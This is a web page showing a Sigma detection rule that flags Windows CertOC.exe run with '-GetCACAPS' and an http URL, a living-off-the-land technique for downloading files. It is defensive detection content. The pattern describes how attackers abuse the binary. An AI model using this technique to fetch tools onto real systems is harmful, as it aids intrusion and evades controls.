File Download via CertOC.EXE

calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
Share on: linkedin copy

Detects when a user downloads a file by using CertOC.exe

Sigma rule (View on GitHub)

 1title: File Download via CertOC.EXE
 2id: 70ad0861-d1fe-491c-a45f-fa48148a300d
 3related:
 4    - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a
 5      type: similar
 6status: test
 7description: Detects when a user downloads a file by using CertOC.exe
 8references:
 9    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/
10author: Nasreddine Bencherchali (Nextron Systems)
11date: 2022-05-16
12modified: 2023-10-18
13tags:
14    - attack.command-and-control
15    - attack.t1105
16logsource:
17    category: process_creation
18    product: windows
19detection:
20    selection_img:
21        - Image|endswith: '\certoc.exe'
22        - OriginalFileName: 'CertOC.exe'
23    selection_cli:
24        CommandLine|contains|all:
25            - '-GetCACAPS'
26            - 'http'
27    condition: all of selection*
28falsepositives:
29    - Unknown
30level: medium

References

  • Certoc on LOLBAS

    CertOC.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.


    Read More

Related rules

to-top